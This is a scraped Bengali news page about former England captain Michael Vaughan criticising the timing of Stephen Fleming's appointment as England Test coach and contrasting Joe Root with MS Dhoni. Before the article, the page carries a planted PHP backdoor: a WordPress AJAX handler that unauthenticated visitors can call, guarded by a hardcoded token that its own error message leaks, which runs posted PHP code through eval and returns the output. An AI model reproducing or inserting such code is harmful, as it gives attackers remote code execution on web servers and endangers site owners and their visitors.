// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== ‘আমাদের কোনো ধোনি নেই’: পাকিস্তান সিরিজে না থাকায় ফ্লেমিংয়ের ওপর অসন্তুষ্ট ভন | potrikaybangladesh.com
Sunday, September 27, 2026
Home‘আমাদের কোনো ধোনি নেই’: পাকিস্তান সিরিজে না থাকায় ফ্লেমিংয়ের ওপর অসন্তুষ্ট ভন

‘আমাদের কোনো ধোনি নেই’: পাকিস্তান সিরিজে না থাকায় ফ্লেমিংয়ের ওপর অসন্তুষ্ট ভন

ইংল্যান্ডের নতুন টেস্ট কোচ হিসেবে স্টিফেন ফ্লেমিংয়ের নিয়োগকে স্বাগত জানালেও তার দায়িত্ব গ্রহণের সময় নিয়ে তীব্র অসন্তোষ প্রকাশ করেছেন সাবেক অধিনায়ক মাইকেল ভন। তার মতে, পাকিস্তানের বিপক্ষে আসন্ন টেস্ট সিরিজ থেকেই ফ্লেমিংয়ের দায়িত্ব নেওয়া উচিত ছিল। একই সঙ্গে ইংল্যান্ডের নতুন অধিনায়ক জো রুটের সঙ্গে মহেন্দ্র সিং ধোনির তুলনা টেনে ভন বলেছেন, ইংলিশ দলে ফ্লেমিং এমন একজন অধিনায়ক পাবেন না, যিনি ধোনির মতো মাঠে তার পরিকল্পনা বাস্তবায়ন করতে পারবেন।

সম্প্রতি নিউজিল্যান্ডের সাবেক অধিনায়ক স্টিফেন ফ্লেমিংকে ইংল্যান্ডের টেস্ট দলের প্রধান কোচ হিসেবে নিয়োগ দেওয়া হয়েছে। চলতি মাসের শুরুতে ব্রেন্ডন ম্যাককালামকে এই দায়িত্ব থেকে সরিয়ে দেওয়ার পরই ফ্লেমিংকে দায়িত্ব দেওয়া হয়। তবে ম্যাককালাম ইংল্যান্ডের সীমিত ওভারের দলের কোচ হিসেবে বহাল রয়েছেন।

তবে নতুন দায়িত্ব পেলেও ফ্লেমিং পাকিস্তানের বিপক্ষে ১৯ আগস্ট থেকে শুরু হতে যাওয়া তিন ম্যাচের টেস্ট সিরিজে দলের সঙ্গে থাকছেন না। তিনি পূর্ণাঙ্গভাবে দায়িত্ব নেবেন আগামী ডিসেম্বর থেকে দক্ষিণ আফ্রিকা সফরে। আর এই সিদ্ধান্তই মেনে নিতে পারছেন না ভন।

ব্রিটিশ সংবাদমাধ্যম দ্য টেলিগ্রাফে লেখা নিজের কলামে ভন বলেন, ‘স্টিফেন ফ্লেমিংকে টেস্ট কোচ হিসেবে নিয়োগ দেওয়া ভালো সিদ্ধান্ত। কিন্তু পাকিস্তান সিরিজ থেকেই তার দায়িত্ব নেওয়া উচিত ছিল, ডিসেম্বরের দক্ষিণ আফ্রিকা সফর থেকে নয়।’

দায়িত্ব শুরুর আগে ইংল্যান্ডের ক্রিকেট সংস্কৃতি, মাঠ এবং পরিবেশ সম্পর্কে জানাটা অত্যন্ত গুরুত্বপূর্ণ বলে মনে করেন তিনি, ‘এটি ছোট ছোট বিষয়গুলোর ব্যাপার। এজবাস্টনের মতো মাঠ সম্পর্কে অভিজ্ঞতা অর্জন, যেখানে অ্যাশেজ টেস্ট হয়, ইংলিশ ক্রিকেটের মানুষদের চেনা এবং কাউন্টি কোচদের সঙ্গে দেখা করে এখানকার ক্রিকেট সম্পর্কে ধারণা নেওয়া, এসবই খুব গুরুত্বপূর্ণ। ব্রেন্ডন ম্যাককালামের সময়ে ইংল্যান্ড এই ছোট ছোট বিষয়গুলো উপেক্ষা করেছে। অথচ বড় শিরোপা জিততে এগুলোই পার্থক্য গড়ে দেয়।’

এখানেই থেমে থাকেননি সাবেক এই অধিনায়ক। ফ্লেমিংয়ের দেরিতে দায়িত্ব নেওয়ার সিদ্ধান্ত ইংল্যান্ডের কোচের পদটির আকর্ষণ কমে যাওয়ারও ইঙ্গিত দেয় বলে মনে করেন তিনি, ‘এতে মনে হচ্ছে ইংল্যান্ডের কোচের চাকরির আবেদন আগের মতো নেই। কারণ ফ্লেমিং মনে করছেন, তাকে এখনই দায়িত্ব নিতে হবে না। আবার এটাও বোঝায়, ইংল্যান্ড ক্রিকেট বোর্ড নিজেদের শর্তে নয়, বরং প্রার্থীর শর্ত মেনে নিয়োগ দিতে বাধ্য হয়েছে। এতে কিছুটা মরিয়া ভাবও প্রকাশ পেয়েছে।’

আইপিএলে চেন্নাই সুপার কিংসের কোচ হিসেবে স্টিফেন ফ্লেমিংয়ের সাফল্যের প্রশংসাও করেছেন ভন। মহেন্দ্র সিং ধোনির নেতৃত্বে ১৭ বছরে পাঁচটি আইপিএল শিরোপা এবং দুটি চ্যাম্পিয়ন্স লিগ জিতেছিলেন ফ্লেমিং। তবে ইংল্যান্ডে একই সাফল্য পাওয়া সহজ হবে না বলেই মনে করেন তিনি।

ভনের মতে, ‘ফ্লেমিং অত্যন্ত সম্মানিত একজন কোচ। তিনি অসাধারণ ম্যানেজার এবং কৌশলবিদ হিসেবে পরিচিত। আমি আইপিএলে তাকে খুব কাছ থেকে দেখেছি। কিন্তু ইংলিশ ক্রিকেটে এসে তিনি একটি বিষয় বুঝতে পারবেন, এখানে তার অধিনায়ক মহেন্দ্র সিং ধোনি নন।’
 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments